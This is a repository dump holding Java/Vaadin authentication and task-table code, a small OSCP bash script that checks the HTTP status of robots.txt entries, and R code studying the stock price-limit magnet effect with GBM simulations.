protected AuthenticationInfo doGetAuthenticationInfo(
AuthenticationToken authcToken) throws AuthenticationException {
UsernamePasswordToken token = (UsernamePasswordToken) authcToken;
String userName = token.getUsername();
String password = new String(token.getPassword());
LoggedInUserImpl loggedInUser = null;
if (identityService.checkPassword(userName, password)) {
loggedInUser = subjectToUserEntity(userName, password);
}
if (loggedInUser != null) {
//WW_TODO set the user information after a successful login
LoginHandler.setUser(loggedInUser);
Subject subject = SecurityUtils.getSubject();
Session session = subject.getSession();
session.setAttribute(LoginHandler.LOGIN_USER_KEY, loggedInUser);
return new SimpleAuthenticationInfo(loggedInUser.getId(),
loggedInUser.getPassword(), getName());
}
return null;
}
public LoggedInUserImpl subjectToUserEntity(String userName, String password) {
LoggedInUserImpl loggedInUser;
User user = identityService.createUserQuery().userId(userName)
.singleResult();
// Fetch and cache user data
loggedInUser = new LoggedInUserImpl(user, password);
List<Group> groups = identityService.createGroupQuery()
.groupMember(user.getId()).list();
for (Group group : groups) {
if (Constants.SECURITY_ROLE.equals(group.getType())) {
loggedInUser.addSecurityRoleGroup(group);
if (Constants.SECURITY_ROLE_USER.equals(group.getId())) {
loggedInUser.setUser(true);
}
if (Constants.SECURITY_ROLE_ADMIN.equals(group.getId())) {
loggedInUser.setAdmin(true);
}
} else {
loggedInUser.addGroup(group);
}
}
return loggedInUser;
}
}
<file_sep>/src/main/java/com/klwork/explorer/project/ProjectTreeTable.java
package com.klwork.explorer.project;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Date;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import org.vaadin.peter.contextmenu.ContextMenu;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuItemClickEvent;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedListener;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedListener.TableListener;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedOnTableFooterEvent;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedOnTableHeaderEvent;
import org.vaadin.peter.contextmenu.ContextMenu.ContextMenuOpenedOnTableRowEvent;
import com.klwork.business.domain.model.Todo;
import com.klwork.business.domain.model.TodoQuery;
import com.klwork.business.domain.service.TodoService;
import com.klwork.common.utils.StringDateUtil;
import com.klwork.common.utils.StringTool;
import com.klwork.explorer.I18nManager;
import com.klwork.explorer.Messages;
import com.klwork.explorer.ViewToolManager;
import com.klwork.explorer.ui.Images;
import com.klwork.explorer.ui.event.SubmitEvent;
import com.klwork.explorer.ui.event.SubmitEventListener;
import com.klwork.explorer.ui.handler.CommonFieldHandler;
import com.klwork.fk.utils.SpringApplicationContextUtil;
import com.klwork.ui.security.LoginHandler;
import com.vaadin.data.Container;
import com.vaadin.data.Item;
import com.vaadin.data.Property;
import com.vaadin.data.Property.ValueChangeEvent;
import com.vaadin.data.Property.ValueChangeListener;
import com.vaadin.data.fieldgroup.FieldGroup;
import com.vaadin.data.fieldgroup.FieldGroup.CommitException;
import com.vaadin.data.util.BeanItem;
import com.vaadin.data.util.HierarchicalContainer;
import com.vaadin.event.Action;
import com.vaadin.event.FieldEvents.BlurEvent;
import com.vaadin.event.FieldEvents.BlurListener;
import com.vaadin.event.FieldEvents.FocusEvent;
import com.vaadin.event.FieldEvents.FocusListener;
import com.vaadin.event.ItemClickEvent;
import com.vaadin.event.ShortcutAction;
import com.vaadin.ui.Alignment;
import com.vaadin.ui.Button;
import com.vaadin.ui.Button.ClickEvent;
import com.vaadin.ui.Button.ClickListener;
import com.vaadin.ui.Table.ColumnGenerator;
import com.vaadin.ui.CheckBox;
import com.vaadin.ui.ComboBox;
import com.vaadin.ui.Component;
import com.vaadin.ui.CustomComponent;
import com.vaadin.ui.DateField;
import com.vaadin.ui.Field;
import com.vaadin.ui.HorizontalLayout;
import com.vaadin.ui.Label;
import com.vaadin.ui.NativeSelect;
import com.vaadin.ui.Notification;
import com.vaadin.ui.Panel;
import com.vaadin.ui.Table;
import com.vaadin.ui.TableFieldFactory;
import com.vaadin.ui.TextField;
import com.vaadin.ui.TreeTable;
import com.vaadin.ui.VerticalLayout;
import com.vaadin.ui.themes.Reindeer;
import com.vaadin.ui.themes.Runo;
public class ProjectTreeTable extends CustomComponent {
private static final long serialVersionUID = 7916755916967574384L;
private String projectId;
protected I18nManager i18nManager;
ProjectMain main = null;
HashMap<String, BeanItem<Todo>> inventoryStore = new HashMap<String, BeanItem<Todo>>();
BeanItem<Todo> testBeanItem = null;
Property<String> integerPropety = null;
private final ArrayList<Object> visibleColumnIds = new ArrayList<Object>();
private final ArrayList<String> visibleColumnLabels = new ArrayList<String>();
// Map to find a field component by its item ID and property ID
final HashMap<Object, HashMap<Object, Field>> fields = new HashMap<Object, HashMap<Object, Field>>();
// Map to find the item ID of a field
final HashMap<Field, Object> itemIds = new HashMap<Field, Object>();
final TreeTable mainTreeTable = new TreeTable("我的周计划");
private BeanItem<Todo> currentBeanItem;
HierarchicalContainer hContainer = null;
private FieldGroup scheduleEventFieldGroup = new FieldGroup();
VerticalLayout bottomLayout;
//
TodoService todoService;
public ProjectTreeTable(String prgId, ProjectMain projectMain) {
System.out.println("ProjectTreeTable 初始化");
this.i18nManager = ViewToolManager.getI18nManager();
this.main = projectMain;
this.projectId = prgId;
todoService = (TodoService) SpringApplicationContextUtil.getContext()
.getBean("todoService");
init();
}
protected void init() {
VerticalLayout layout = new VerticalLayout();
setCompositionRoot(layout);
layout.setSizeFull();
initHead(layout);
// Main view
initMain(layout);
}
@SuppressWarnings("unchecked")
private Todo getFieldGroupTodo() {
BeanItem<Todo> item = (BeanItem<Todo>) scheduleEventFieldGroup
.getItemDataSource();
Todo todo = item.getBean();
initTodoProId(todo);
return todo;
}
public void initTodoProId(Todo todo) {
// WW_TODO set the project id and user when saving
if (!StringTool.judgeBlank(todo.getProId())) {
todo.setProId(projectId);
}
if (todo.getAssignedUser() == null) {
todo.setAssignedUser(LoginHandler.getLoggedInUser().getId());
}
}
private void initHead(VerticalLayout layout) {
// Header
HorizontalLayout header = new HorizontalLayout();
header.setWidth(100, Unit.PERCENTAGE);
/*
* final Button saveButton = new Button(
* i18nManager.getMessage(Messages.PROFILE_SAVE));
* saveButton.setIcon(Images.SAVE); saveButton.addClickListener(new
* ClickListener() { public void buttonClick(ClickEvent event) {
* commit(); }
*
* });
*
* header.addComponent(saveButton);
* header.setComponentAlignment(saveButton, Alignment.MIDDLE_RIGHT);
*/
layout.addComponent(header);
layout.setSpacing(true);
}
void initMain(VerticalLayout layout) {
// Wrap in a panel so keyboard shortcuts work
Panel panel = new Panel();
panel.addActionHandler(new KbdHandler());
// panel.setHeight(-1, Unit.PIXELS);
layout.addComponent(panel);
layout.setExpandRatio(panel, 1.0f);
panel.setContent(mainTreeTable);
// init tabletree
mainTreeTable.setEditable(true);
mainTreeTable.setImmediate(true);
mainTreeTable.setWidth("100%");
mainTreeTable.setHeight("500px");
mainTreeTable.setColumnExpandRatio("name", 1);
mainTreeTable.setSelectable(true);
mainTreeTable.setColumnReorderingAllowed(true);
// Build the data
hContainer = createTreeContent();
mainTreeTable.setContainerDataSource(hContainer);
// Table presentation settings; bind the data
initTableField(mainTreeTable);
// Drag and drop
// handDrop(ttable);
// Configure the header display (which columns are visible and their labels)
setTableHeadDisplay(mainTreeTable);
// Configure row double-click handling and other listeners
setTableListener(mainTreeTable);
Object hierarchyColumnId = "name";
// Which column shows the tree hierarchy
mainTreeTable.setHierarchyColumn(hierarchyColumnId);
// Right-click context menu
rightClickHandler(mainTreeTable);
mainTreeTable.setImmediate(true);
// Expand all nodes
collapsedAll(mainTreeTable);
}
private void collapsedAll(final TreeTable ttable) {
for (Object item : ttable.getItemIds().toArray()) {
collapsedSub(ttable, item);
}
}
private void collapsedSub(final TreeTable ttable, Object item) {
ttable.setCollapsed(item, false);
if (ttable.hasChildren(item)) {
for (Object a : ttable.getChildren(item).toArray()) {
ttable.setCollapsed(a, false);
collapsedSub(ttable, a);
}
}
}
private void setTableListener(final TreeTable ttable) {
ttable.addItemClickListener(new ItemClickEvent.ItemClickListener() {
private static final long serialVersionUID = -348059189217149508L;
@Override
public void itemClick(ItemClickEvent event) {
if (event.isDoubleClick()) {
// Notification.show(event.getSource().toString());
Object source = event.getItemId();
HashMap<Object, Field> itemMap = fields.get(source);
for (Field f : itemMap.values()) {
f.focus();
}
}
}
});
ttable.addValueChangeListener(new ValueChangeListener() {
@Override
public void valueChange(ValueChangeEvent event) {
Object value = ttable.getValue();
if (value instanceof BeanItem) {
currentBeanItem = (BeanItem<Todo>) value;
}
// Also update the data shown below
// updateBottomLayout(bottomLayout);
}
});
addListener(new SubmitEventListener() {
private static final long serialVersionUID = 1L;
protected void submitted(SubmitEvent event) {
}
protected void cancelled(SubmitEvent event) {
}
});
}
private void setTableHeadDisplay(final TreeTable ttable) {
visibleColumnIds.add("name");
visibleColumnIds.add("priority");
visibleColumnIds.add("complete");
visibleColumnIds.add("endTime");
visibleColumnIds.add("useUp");
visibleColumnIds.add("due");
visibleColumnIds.add("status");
visibleColumnIds.add("tags");
visibleColumnIds.add("type");
visibleColumnIds.add("edit");
visibleColumnLabels.add("标题");
visibleColumnLabels.add("!");
visibleColumnLabels.add("%");
visibleColumnLabels.add("结束时间");
visibleColumnLabels.add("耗尽");
visibleColumnLabels.add("到期");
visibleColumnLabels.add("状态");
visibleColumnLabels.add("标签");
visibleColumnLabels.add("类型");
visibleColumnLabels.add("操作");
ttable.addGeneratedColumn("edit", new ValueEditColumnGenerator());
ttable.setVisibleColumns(visibleColumnIds.toArray());
ttable.setColumnHeaders(visibleColumnLabels.toArray(new String[0]));
}
private void rightClickHandler(final TreeTable ttable) {
ContextMenu tableContextMenu = new ContextMenu();
tableContextMenu.addContextMenuTableListener(createOpenListener());
tableContextMenu.addItem("新建子任务").addItemClickListener(
new ContextMenu.ContextMenuItemClickListener() {
@Override
public void contextMenuItemClicked(
ContextMenuItemClickEvent event) {
Item parentItem = hContainer.getItem(currentBeanItem);
Todo newTodo = todoService.newTodo();
newTodo.setProId(projectId);
BeanItem newbeanItem = new BeanItem<Todo>(newTodo);
Item nItem = hContainer.addItem(newbeanItem);
hContainer.setChildrenAllowed(newbeanItem, false);
hContainer.setChildrenAllowed(currentBeanItem, true);
copyBeanValueToContainer(hContainer, newbeanItem);
// Set the parent node
hContainer.setParent(newbeanItem, currentBeanItem);
Todo paretTodo = currentBeanItem.getBean();
// Set the new record's pid to the parent id
hContainer.getContainerProperty(newbeanItem, "pid")
.setValue(paretTodo.getId());
// Mark the old record as a container
hContainer.getContainerProperty(currentBeanItem,
"isContainer").setValue(1);
ttable.setCollapsed(currentBeanItem, false);
ttable.setImmediate(true);
}
});
tableContextMenu.addItem("新建任务").addItemClickListener(
new ContextMenu.ContextMenuItemClickListener() {
@Override
public void contextMenuItemClicked(
ContextMenuItemClickEvent event) {
Todo newTodo = todoService.newTodo();
newTodo.setProId(projectId);
BeanItem newbeanItem = new BeanItem<Todo>(newTodo);
Item nItem = hContainer.addItem(newbeanItem);
hContainer.setChildrenAllowed(newbeanItem, false);
copyBeanValueToContainer(hContainer, newbeanItem);
// Set the parent node
hContainer.setParent(newbeanItem, null);
}
});
tableContextMenu.setAsTableContextMenu(ttable);
}
private TableListener createOpenListener() {
ContextMenuOpenedListener.TableListener openListener = new ContextMenuOpenedListener.TableListener() {
@Override
public void onContextMenuOpenFromRow(
ContextMenuOpenedOnTableRowEvent event) {
Object itemId = event.getItemId();
if (itemId instanceof BeanItem) {
currentBeanItem = (BeanItem<Todo>) itemId;
}
// contextMenu.open(event.getX(), event.getY());
}
@Override
public void onContextMenuOpenFromHeader(
ContextMenuOpenedOnTableHeaderEvent event) {
}
@Override
public void onContextMenuOpenFromFooter(
ContextMenuOpenedOnTableFooterEvent event) {
}
};
return openListener;
}
private void openEdit(TreeTable ttable, final Object itemId) {
HashMap<Object, Field> itemMap = fields.get(itemId);
//
for (Field f : itemMap.values())
f.setReadOnly(false);
ttable.select(itemId);
}
private void initTableField(final TreeTable ttable) {
ttable.setTableFieldFactory(new TableFieldFactory() {
private static final long serialVersionUID = -5741977060384915110L;
public Field createField(Container container, Object itemId,
final Object propertyId, Component uiContext) {
TextField tf = null;
if ("name".equals(propertyId)) {
final BeanItem<Todo> beanItem = (BeanItem<Todo>) itemId;
if (getTfFromCache(itemId, propertyId) != null) {
tf = getTfFromCache(itemId, propertyId);
// bindFieldToObje(itemId, propertyId, tf, beanItem);
return tf;
}
tf = new TextField((String) propertyId);
// bindFieldToObje(itemId, propertyId, tf, beanItem);
// Needed for the generated column
tf.setImmediate(true);
tf.setReadOnly(true);
tf.setWidth("100%");
tf.addFocusListener(new FocusListener() {
private static final long serialVersionUID = 1006388127259206641L;
public void focus(FocusEvent event) {
openEdit(ttable, beanItem);
}
});
tf.addBlurListener(new BlurListener() {
private static final long serialVersionUID = -4497552765206819985L;
public void blur(BlurEvent event) {
HashMap<Object, Field> itemMap = fields
.get(beanItem);
for (Field f : itemMap.values()) {// make all fields read-only
f.setReadOnly(true);
}
// copy toBean
Todo todo = tableItemToBean(currentBeanItem);
List<Todo> l = new ArrayList();
l.add(todo);
todoService.saveTodoList(l);
// reflashBottom();
}
});
// Put the name field into the cache
saveTfToCache(itemId, propertyId, tf);
} else {
tf = new TextField((String) propertyId);
tf.setData(itemId);
tf.setImmediate(true);
// tf.setSizeFull();
// tf.setSizeUndefined();
tf.setWidth(50, Unit.PIXELS);
tf.setReadOnly(true);
}
return tf;
}
private void bindFieldToObje(Object itemId,
final Object propertyId, TextField tf,
final BeanItem<Todo> beanItem) {
BeanItem<Todo> f = inventoryStore.get(getBeanSign(beanItem));
tf.setPropertyDataSource(f.getItemProperty(propertyId));
System.out.println(propertyId + "---------" + itemId);
}
private void saveTfToCache(final Object itemId,
final Object propertyId, TextField tf) {
if (tf != null) {
// Manage the field in the field storage
HashMap<Object, Field> itemMap = fields.get(itemId);
if (itemMap == null) {
itemMap = new HashMap<Object, Field>();
fields.put(itemId, itemMap);
}
itemMap.put(propertyId, tf);// one TextField per property
itemIds.put(tf, itemId);
}
}
private TextField getTfFromCache(Object itemId, Object propertyId) {
TextField tf = null;
// Manage the field in the field storage
HashMap<Object, Field> itemMap = fields.get(itemId);
if (itemMap == null) {
itemMap = new HashMap<Object, Field>();
fields.put(itemId, itemMap);
}
if (itemMap.get(propertyId) != null) {
tf = (TextField) itemMap.get(propertyId);
}
return tf;
}
}
);
}
/**
* Creates the table container properties
*
* @return
*/
public HierarchicalContainer createTreeContent() {
HierarchicalContainer container = new HierarchicalContainer();
container.addContainerProperty("priority", String.class, "");
container.addContainerProperty("complete", String.class, "");
container.addContainerProperty("endTime", String.class, "");
container.addContainerProperty("useUp", String.class, "");
container.addContainerProperty("due", String.class, "");
container.addContainerProperty("status", String.class, "");
container.addContainerProperty("tags", String.class, "");
container.addContainerProperty("type", String.class, "");
container.addContainerProperty("name", String.class, "");
container.addContainerProperty("id", String.class, "");
container.addContainerProperty("pid", String.class, "");
container.addContainerProperty("container", Boolean.class, null);
container.addContainerProperty("isContainer", Integer.class, null);
initContainerData(container, getQuery("-1"), null);
return container;
}
private TodoQuery getQuery(String pid) {
TodoQuery query = new TodoQuery();
query.setProId(projectId).setPid(pid).setOrderBy(" pid asc,id asc");
return query;
}
private void initContainerData(HierarchicalContainer container,
TodoQuery query, BeanItem<Todo> parent) {
List<Todo> beanList = todoService.findTodoByQueryCriteria(query, null);
for (Iterator iterator = beanList.iterator(); iterator.hasNext();) {
Todo todo = (Todo) iterator.next();
BeanItem<Todo> newBeanItem = new BeanItem(todo);
container.addItem(newBeanItem);
container.setParent(newBeanItem, parent);
copyBeanValueToContainer(container, newBeanItem);
inventoryStore.put(getBeanSign(newBeanItem), newBeanItem);
boolean isContainer = StringTool.parseBoolean(todo.getIsContainer()
+ "");
if (isContainer) {
container.setChildrenAllowed(newBeanItem, true);
initContainerData(container, getQuery(todo.getId()),
newBeanItem);
} else {
container.setChildrenAllowed(newBeanItem, false);
}
/*
* if(parent != null){ mainTreeTable.setCollapsed(parent, false); }
*/
}
}
/**
* Copy the bean values into the container
*
* @param container
* @param newBeanItem
*/
public void copyBeanValueToContainer(HierarchicalContainer container,
BeanItem<Todo> newBeanItem) {
for (Object propertyId : container.getContainerPropertyIds()) {
setContainerValueByBean(container, newBeanItem, propertyId);
}
}
private String getBeanSign(BeanItem<Todo> beanItem) {
return beanItem.getBean().getId() + "_" + beanItem.getBean().getName();
}
/**
* Set a container property from the bean's field value
*
* @param container
* @param beanItem
* @param propertyId
*/
private void setContainerValueByBean(HierarchicalContainer container,
BeanItem<Todo> beanItem, Object propertyId) {
Todo t = beanItem.getBean();
String[] benTo = { "priority", "type", "tag", "name", "id", "pid" };
for (int i = 0; i < benTo.length; i++) {
if (benTo[i].equals(propertyId)) {
Property itemProperty = beanItem.getItemProperty(propertyId);
// copy the bean property into the container
/*
* Property itemProperty2 =
* container.getItem(beanItem).getItemProperty(propertyId);
* itemProperty2 .setValue(itemProperty.getValue());
*/
String newValue = itemProperty.getValue() + "";
container.getContainerProperty(beanItem, propertyId).setValue(
newValue);
}
}
/*
* container.addContainerProperty("priority", String.class, "");
* container.addContainerProperty("complete", String.class, "");
* container.addContainerProperty("endTime", String.class, "");
* container.addContainerProperty("useUp", String.class, "");
* container.addContainerProperty("due", String.class, "");
* container.addContainerProperty("status", String.class, "");
* container.addContainerProperty("tags", String.class, "");
* container.addContainerProperty("type", String.class, "");
* container.addContainerProperty("name", String.class, "");
* container.addContainerProperty("container", Boolean.class, null);
*/
if ("isContainer".equals(propertyId)) {
container.getContainerProperty(beanItem, propertyId).setValue(
t.getIsContainer());
}
if ("container".equals(propertyId)) {
boolean v = StringTool.parseBoolean(t.getIsContainer() + "");
container.getContainerProperty(beanItem, propertyId).setValue(v);
}
if ("due".equals(propertyId)) {
String v = StringDateUtil.dateToYMDString(new Date());
container.getContainerProperty(beanItem, propertyId).setValue(v);
}
}
/**
* Commit the entire contents of the table
*/
public void allCommit() {
mainTreeTable.commit();
List<Todo> beanList = tableDataBeanList();
todoService.saveTodoList(beanList);
}
// Convert the table's rows into beans; getItemIds only contains the specified items
private List<Todo> tableDataBeanList() {
List<Todo> beanList = new ArrayList<Todo>();
Collection<?> list = mainTreeTable.getItemIds();
for (Iterator iterator = list.iterator(); iterator.hasNext();) {// table rows
BeanItem<Todo> beanItem = (BeanItem) iterator.next();
Todo todo = tableItemToBean(beanItem);
initTodoProId(todo);
beanList.add(todo);
System.out.println("--------------" + todo);
}
return beanList;
}
/**
* Copy the table data back into the bean
*
* @param beanItem
* @return
*/
public Todo tableItemToBean(BeanItem<Todo> beanItem) {
String[] benTo = { "name", "id", "pid", "isContainer" };
for (int i = 0; i < benTo.length; i++) {// properties that need to be assigned
Property itemProperty = beanItem.getItemProperty(benTo[i]);
Object newValue = mainTreeTable.getContainerDataSource()
.getContainerProperty(beanItem, benTo[i]).getValue();
itemProperty.setValue(newValue);
}
Todo todo = beanItem.getBean();
initTodoProId(todo);
return todo;
}
// Keyboard navigation
class KbdHandler implements com.vaadin.event.Action.Handler {
private static final long serialVersionUID = -2993496725114954915L;
Action f2 = new ShortcutAction("F2", ShortcutAction.KeyCode.F2, null);
@Override
public Action[] getActions(Object target, Object sender) {
return new Action[] { f2 };
}
@Override
public void handleAction(Action action, Object sender, Object target) {
System.out.println("sdfdf");
if (target instanceof TreeTable) {
// Object itemid = ((TextField) target).getData();
HashMap<Object, Field> itemMap = fields.get(currentBeanItem);
for (Field f : itemMap.values()) {
f.focus();
}
}
}
}
public class ValueEditColumnGenerator implements ColumnGenerator {
/**
*
*/
private static final long serialVersionUID = -5950078454864053894L;
@Override
public Object generateCell(Table source, final Object itemId, Object columnId) {
Button editButton = new Button("");
editButton.addStyleName(Reindeer.BUTTON_LINK);
editButton.setIcon(Images.EDIT);
editButton.addClickListener(new ClickListener() {
public void buttonClick(ClickEvent event) {
// WW_TODO apply the modification in the backend
EditTodoPopupWindow editTodoPop = new EditTodoPopupWindow(
(BeanItem<Todo>) itemId,projectId);
editTodoPop.addListener(new SubmitEventListener() {
private static final long serialVersionUID = 1L;
@Override
protected void cancelled(SubmitEvent event) {
}
@Override
protected void submitted(SubmitEvent event) {
if(event.getData() != null){
//Copy the values back and refresh the calendar
copyBeanValueToContainer(hContainer,(BeanItem<Todo>) event.getData());
main.refreshCalendarView();
}
}
});
ViewToolManager.showPopupWindow(editTodoPop);
}
});
return editButton;
}
}
}
|
036b5be32e7ae78e73a52262c48cdedc99d29a64
|
[
"Java",
"Ant Build System",
"INI"
] | 9
|
INI
|
klwork/klwork-social
|
dae0601505995119c678af8c970cdcd15d8bf7f8
|
989538a5aef1d19d382a8b3b493eef4e303b9f38
|
refs/heads/master
|
<repo_name>jinnu92/OSCP-tools<file_sep>/robots.txt.test.sh
#!/bin/bash
# Pass to me the URL:
# e.g.:
# ./robots.txt.test.sh http://10.10.0.22
#
wget $1/robots.txt
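# Extract every path listed in robots.txt (the second field of each directive),
# prepend the base URL, then HEAD-request each candidate and print "url:http_code".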
for url in $(for uri in $(awk '{print $2}' robots.txt |egrep '^/');
do
echo $1$uri;
done);
do curl -o /dev/null --silent --head --write-out '%{url_effective}:%{http_code}\n' $url;
done
<file_sep>/README.md
# OSCP-tools
Custom Tools and Notes from my OSCP PWK experience
## Recon Tools
* *Robots.txt.test.sh* - This tool will grab the robots.txt file and run through each entry to display the HTTP status of the file.
* Run with `chmod +x robots.txt.test.sh && ./robots.txt.test.sh http://10.10.0.22` (pass the target base URL as the only argument)
|
d0fa4f95b9a7761b445d8a56170c9a7a39ae4fe0
|
[
"Markdown",
"Shell"
] | 2
|
Shell
|
jinnu92/OSCP-tools
|
26cf65cf0cdf880ee3cbceec48dceb36e89c3dd7
|
032d92ff303db7b7b0803eef999a0c185714b2e9
|
refs/heads/master
|
<file_sep>### Sample selection criteria
+ Sample period
+ Main board
+ Non-ST
+ Normal trading status
### Diagram
+ greater reach-limit possibility
+ up vs. down
+ hit vs. last (when ending)
+ robustness: daily vs. intraday estimates
+ the closer, the stronger effect
+ the harder to value, the stronger effect
+ the stronger investor sentiment, the stronger effect
# rhetorics
+ Technically, we exclude observations where stock hits the price limit within 3 seconds from the stock market opening
+ If there was really bad news overnight, the price will hit the lower price limit at market opening, thus the maximum price percent change would be fixed at around -10% during the day.
+ Note that there exist more stock-days that have a maximum or minimum price percent change at zero, which are clipped for a neater prospect.
+ It indicates that whenever the magnet effect takes effect, investors will no longer care about what quality the stock is, growth or not, profitable or not.
# Introduction
+ normal
+ certain price
+ china, limit, picture
+ high distribution fig
# Data & Summary Statistics
+ table
+ reach time ditribution
# 123
+ When running the analysis, drop stock-days that already sit at a given threshold right at the open
+ Rising to 9% intraday is not the same as opening at 9%
+ Maximum absolute price change (histogram)
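# GBM benchmark (reference only)
+ Under the GBM assumption used in the simulations (drift $\mu$, volatility $\sigma$, remaining time $T$), the probability of touching the upper limit $B$ before the close, starting from the threshold price $S_0$, has a standard closed form with $\nu = \mu - \sigma^2/2$ and $b = \ln(B/S_0)$; the notation here is ours, added only as a sanity check on the Monte Carlo estimates:

$$
P\Big(\max_{0 \le t \le T} S_t \ge B\Big)
= \Phi\!\left(\frac{\nu T - b}{\sigma\sqrt{T}}\right)
+ e^{2\nu b/\sigma^{2}}\,\Phi\!\left(\frac{-b - \nu T}{\sigma\sqrt{T}}\right)
$$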
<file_sep>library(tidyverse)
library(lubridate)
library(readxl)
library(zoo)
library(cnquant)
library(stargazer)
library(scales)
load("data/01-D-Sequential-Data.RData")
load("~/Documents/Stock-Data/D-Stock-Daily-Data.RData")
# Valid indices ----
# The opening price must not already exceed the threshold
Nonopen_Valid_Indices <- list(
UP = sapply(thresholds, function(threshold)
with(Stock_Daily_Data3$UP, S_DQ_OPEN < S_DQ_PRECLOSE * (1 + threshold))),
DOWN = sapply(-thresholds, function(threshold)
with(Stock_Daily_Data3$DOWN, S_DQ_OPEN > S_DQ_PRECLOSE * (1 + threshold)))
)
# # Valid N
# N_Valid_Indices <- N %>%
# lapply(function(x) apply(x, 2, function(y) between(y, 2L, 4798L)))
# Probs_Theo valid indices
Probs_Theo_Valid_Indices <- Probs_Theo %>%
lapply(function(x) !is.na(x))
# Aggregate valid indices
Valid_Indices <- list(
UP = Nonopen_Valid_Indices$UP & Probs_Theo_Valid_Indices$UP,
DOWN = Nonopen_Valid_Indices$DOWN & Probs_Theo_Valid_Indices$DOWN
)
# Number of valid observations
Valid_Thre_Count <- Valid_Indices %>%
sapply(function(x) apply(x, 2, sum)) %>%
cbind(ALL = apply(., 1, sum), .) %>%
t() %>%
`colnames<-`(percent(thresholds, accuracy = .1)) %>%
`rownames<-`(c("All", "Upper", "Lower")) %>%
as_tibble(rownames = "Direction")
## Print the number of valid observations
Valid_Thre_Count
# Distribution and proportion of daily maximum returns ----
p_Max_Dist <- Stock_Daily_Data1 %>%
mutate(HIGH_PCTCHANGE = S_DQ_HIGH / S_DQ_PRECLOSE - 1) %>%
ggplot(aes(x = HIGH_PCTCHANGE)) +
geom_histogram(binwidth = 0.0001) +
scale_x_continuous(labels = percent) +
coord_cartesian(ylim = c(0, 10000)) +
labs(x = "Maximum price percent change in the day",
y = "Count")
p_Max_Dist_Zoom <- p_Max_Dist +
coord_cartesian(xlim = c(0.08, 0.1), ylim = c(0, 10000))
p_Min_Dist <- Stock_Daily_Data1 %>%
mutate(LOW_PCTCHANGE = S_DQ_LOW / S_DQ_PRECLOSE - 1) %>%
ggplot(aes(x = LOW_PCTCHANGE)) +
geom_histogram(binwidth = 0.0001) +
scale_x_continuous(labels = percent) +
coord_cartesian(ylim = c(0, 10000)) +
labs(x = "Minimum price percent change in the day",
y = "Count")
p_Min_Dist_Zoom <- p_Min_Dist +
coord_cartesian(xlim = c(-0.1, -0.08), ylim = c(0, 10000))
## Output the figures
Rmisc::multiplot(p_Max_Dist, p_Max_Dist_Zoom, p_Min_Dist, p_Min_Dist_Zoom, cols = 2L)
## Table of extreme-return proportions
Extreme_Prop <- tibble(
Direction = c("All", "Upper", "Lower"),
`Obs. All` = nrow(Stock_Daily_Data1),
`Obs. Reach 9%` = c(Stock_Daily_Data2 %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_UP_THRESHOLD) %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_DOWN_THRESHOLD) %>% nrow()),
`Obs. Reach Limit` = c(Stock_Daily_Data2 %>% filter(REACH_UP_LIMIT | REACH_DOWN_LIMIT) %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_UP_LIMIT) %>% nrow(),
Stock_Daily_Data2 %>% filter(REACH_DOWN_LIMIT) %>% nrow())
) %>%
mutate(`Prob. Reach 9%` = `Obs. Reach 9%` / `Obs. All`,
`Prob. Reach Limit` = `Obs. Reach Limit` / `Obs. All`,
`Con. Prob. Reach Limit` = `Prob. Reach Limit` / `Prob. Reach 9%`) %>%
mutate_at(vars(`Prob. Reach 9%`:`Con. Prob. Reach Limit`),
formattable::percent, digits = 1L)
Extreme_Prop
# MCMC illustration ----
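# Simulate 10 example GBM trajectories for the first stock-day in the upper
# sample: paths start at that day's threshold price (UP_THRESHOLD[1]) at its
# recorded hit time and use the day's estimated drift (mu) and volatility
# (sigma); the plot overlays the threshold (blue) and the price limit (red).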
set.seed(36L)
Exam_Traj <- Sim.DiffProc::GBM(N = N$UP[1, 1],
M = 10,
x0 = Stock_Daily_Data3$UP$UP_THRESHOLD[1],
t0 = t1$UP[1, 1] / 14400L,
theta = Stock_Daily_Data3$UP$mu[1],
sigma = Stock_Daily_Data3$UP$sigma[1])
p_Exam_Traj <- Exam_Traj %>%
data.frame(Time = time(.), .) %>%
as_tibble() %>%
gather(Trajectory, Price, -Time) %>%
ggplot(aes(x = Time, y = Price, group = Trajectory)) +
geom_line(size = 0.2) +
scale_x_continuous(limits = c(13/24, 1),
breaks = seq(14/24, 1, length.out = 6),
labels = parse_time(c("132000", "134000", "140000", "142000", "144000", "150000"), format = "%H%M%S")) +
scale_y_continuous(limits = c(12, 12.65),
breaks = c(12, 12.2, Stock_Daily_Data3$UP$UP_THRESHOLD[1], 12.4, Stock_Daily_Data3$UP$UP_LIMIT[1], 12.6),
labels = dollar_format(prefix = "¥")) +
geom_hline(yintercept = Stock_Daily_Data3$UP$UP_THRESHOLD[1], col = "blue") +
geom_hline(yintercept = Stock_Daily_Data3$UP$UP_LIMIT[1], col = "red")
# Baseline results ----
# Keep only the variables we need
Stock_Daily_Data3$UP <- Stock_Daily_Data3$UP %>% mutate(reach_prac = REACH_UP_LIMIT)
Stock_Daily_Data3$DOWN <- Stock_Daily_Data3$DOWN %>% mutate(reach_prac = REACH_DOWN_LIMIT)
Stock_Daily_Data3 <- Stock_Daily_Data3 %>%
lapply(select, S_INFO_WINDCODE, TRADE_DT, reach_prac)
# Merge the theoretical probabilities into the original data
Core_Data <- list(
UP = Stock_Daily_Data3$UP %>%
mutate(prob_theo = Probs_Theo$UP[, 1]) %>%
filter(Valid_Indices$UP[, 1]),
DOWN = Stock_Daily_Data3$DOWN %>%
mutate(prob_theo = Probs_Theo$DOWN[, 1]) %>%
filter(Valid_Indices$DOWN[, 1])
)
# Build a combined table
Core_Data$ALL <- bind_rows(Core_Data, .id = "Direction")
# Practical vs. theoretical probabilities
Prac_Vs_Theo <- Core_Data %>%
lapply(function(df) {
df %>%
summarise(Prob_Prac = mean(reach_prac),
Prob_Theo = mean(prob_theo),
Diff = Prob_Prac - Prob_Theo,
t.stat = t.test(reach_prac, prob_theo, paired = TRUE)$statistic,
p.value = t.test(reach_prac, prob_theo, paired = TRUE)$p.value,
N = n())
}) %>%
bind_rows(.id = "Direction")
